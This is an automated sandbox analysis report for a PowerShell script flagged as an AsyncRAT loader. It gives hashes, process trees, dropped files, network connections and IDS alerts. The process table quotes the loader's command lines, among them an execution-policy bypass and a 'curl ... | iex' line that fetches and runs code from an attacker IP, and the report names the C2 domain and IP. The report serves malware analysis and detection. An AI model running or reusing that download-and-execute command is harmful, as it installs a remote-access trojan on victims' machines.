File name:

8ucvlid61jhtr.ps1

Full analysis: https://app.any.run/tasks/506b73b4-c60a-4bc4-b72a-0eb0eb27c91e
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Analysis date: January 24, 2025, 19:10:54
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
rat
asyncrat
remote
minst
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (65536), with no line terminators
MD5:

78113996C94C5A1FCACBA8DA4CA86DDE

SHA1:

95F0C7F6071A9661E505D1C023219F80FE376DF1

SHA256:

2DD4DBA195A2994751E11F855A1A4D9F6CA384867B8E5F62B0E692729603FE05

SSDEEP:

6144:/BlDrzkfnSeYoS35+Xft0wUSrgmDqXT020hLCCd6iY9hK3QKY0cgk9ccuotwxA:D8So4ClisDE41hsEa/cg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1200)
    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 1200)
    • MINSTLOADER has been detected

      • powershell.exe (PID: 1200)
  • SUSPICIOUS

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6016)
      • csc.exe (PID: 6400)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 6016)
      • csc.exe (PID: 6400)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 1200)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 1200)
    • Connects to unusual port

      • powershell.exe (PID: 1200)
    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 1200)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 1200)
    • Download files or web resources using Curl/Wget

      • powershell.exe (PID: 1200)
    • Execution of CURL command (POWERSHELL)

      • powershell.exe (PID: 5876)
    • Found IP address in command line

      • powershell.exe (PID: 5876)
    • Application launched itself

      • powershell.exe (PID: 1200)
  • INFO

    • Create files in a temporary directory

      • csc.exe (PID: 6016)
      • cvtres.exe (PID: 6060)
      • cvtres.exe (PID: 6420)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1200)
      • powershell.exe (PID: 5876)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 6016)
      • csc.exe (PID: 6400)
    • Checks supported languages

      • csc.exe (PID: 6016)
      • cvtres.exe (PID: 6060)
      • csc.exe (PID: 6400)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1200)
    • Disables trace logs

      • powershell.exe (PID: 1200)
      • powershell.exe (PID: 5876)
    • Checks proxy server information

      • powershell.exe (PID: 1200)
      • powershell.exe (PID: 5876)
    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 5876)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
133
Monitored processes
8
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start #ASYNCRAT powershell.exe conhost.exe no specs csc.exe cvtres.exe no specs powershell.exe conhost.exe no specs csc.exe cvtres.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1200"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\8ucvlid61jhtr.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
3576\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5856\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5876"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c curl -useb 64.52.80.211/1.php?s=boicn| iex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6016"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\u40yw0wp.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
6060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA089.tmp" "c:\Users\admin\AppData\Local\Temp\CSC30238337F8E748A4A4694F402C31B3EA.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
6400"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\3hishymq.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
6420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF446.tmp" "c:\Users\admin\AppData\Local\Temp\CSC6CEABDAD1F6C4700A9EEC156CF3D61.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
Total events
15 690
Read events
15 690
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
9
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
1200powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:99AD24B2F14971BC30899906EA050D67
SHA256:55D5702317F34D23920473E8D04FB96758AC9135DF442BACB54062A8B567B2EB
6016csc.exeC:\Users\admin\AppData\Local\Temp\u40yw0wp.outtext
MD5:FC96D4D15B3823CCCB8A0586E63F2406
SHA256:C3C573CAD58D03128632050A5686EB597EFC919C29ADE230555B5EB5ABB1D866
6016csc.exeC:\Users\admin\AppData\Local\Temp\u40yw0wp.dllexecutable
MD5:F399CB3B636C3E686E83EA962EA9C5F3
SHA256:2AD319EEA054BDC8683C01EBA11670BE916D1D21F445182711EC9844483152BC
1200powershell.exeC:\Users\admin\AppData\Local\Temp\3hishymq.0.cstext
MD5:36378AF3E9CADD94CED6728517519BC9
SHA256:DCEEEF4A04AD74F7274337FAC4BB19CD95A3E38D14189F7095DD9E7E416573DB
1200powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J1M0ZAWA3D5EICTX1QWI.tempbinary
MD5:99AD24B2F14971BC30899906EA050D67
SHA256:55D5702317F34D23920473E8D04FB96758AC9135DF442BACB54062A8B567B2EB
1200powershell.exeC:\Users\admin\AppData\Local\Temp\u40yw0wp.cmdlinetext
MD5:898C25974D1329E567787331E04DC95C
SHA256:9F7B2FE24949040022790951EF024AF449974942C017787632AE18355AB0CCCB
6060cvtres.exeC:\Users\admin\AppData\Local\Temp\RESA089.tmpbinary
MD5:3E0F74B08D74B2FA60833B37C1A98509
SHA256:0F639797713D364E4F5D32AFA4F59224A93D09B5A827AE62B81AE420EE832AD4
6016csc.exeC:\Users\admin\AppData\Local\Temp\CSC30238337F8E748A4A4694F402C31B3EA.TMPbinary
MD5:04BB31874AB60357BFB32EAE23B07E92
SHA256:A0FE5F4895D4956D88D7FB7CE971EBED6F837914809C543A34C8D5562EE48D0D
6400csc.exeC:\Users\admin\AppData\Local\Temp\3hishymq.dllexecutable
MD5:1A126E6D17ECFBCBE7130027E1AC9EE4
SHA256:DC728CACC16CD23C2D8CD80E86B171B8B5578E048AA9E72E7800068344338E09
1200powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3gfvzqru.5ld.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
30
DNS requests
16
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3436
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6256
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6256
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
1356
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
2.23.227.215:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
1076
svchost.exe
184.28.89.167:443
go.microsoft.com
AKAMAI-AS
US
whitelisted
5064
SearchApp.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
1176
svchost.exe
40.126.31.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
1200
powershell.exe
86.107.101.93:25658
toavt7i2d6fgwei.top
SC Access Media Group SRL
RO
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.227.215
  • 2.23.227.208
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
login.live.com
  • 40.126.31.71
  • 20.190.159.75
  • 20.190.159.73
  • 40.126.31.67
  • 20.190.159.68
  • 20.190.159.2
  • 40.126.31.69
  • 20.190.159.4
whitelisted
toavt7i2d6fgwei.top
  • 86.107.101.93
unknown
api.ipify.org
  • 104.26.12.205
  • 172.67.74.152
  • 104.26.13.205
shared
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
1200
powershell.exe
Domain Observed Used for C2 Detected
ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
1200
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] AsyncRAT Successful Connection
No debug info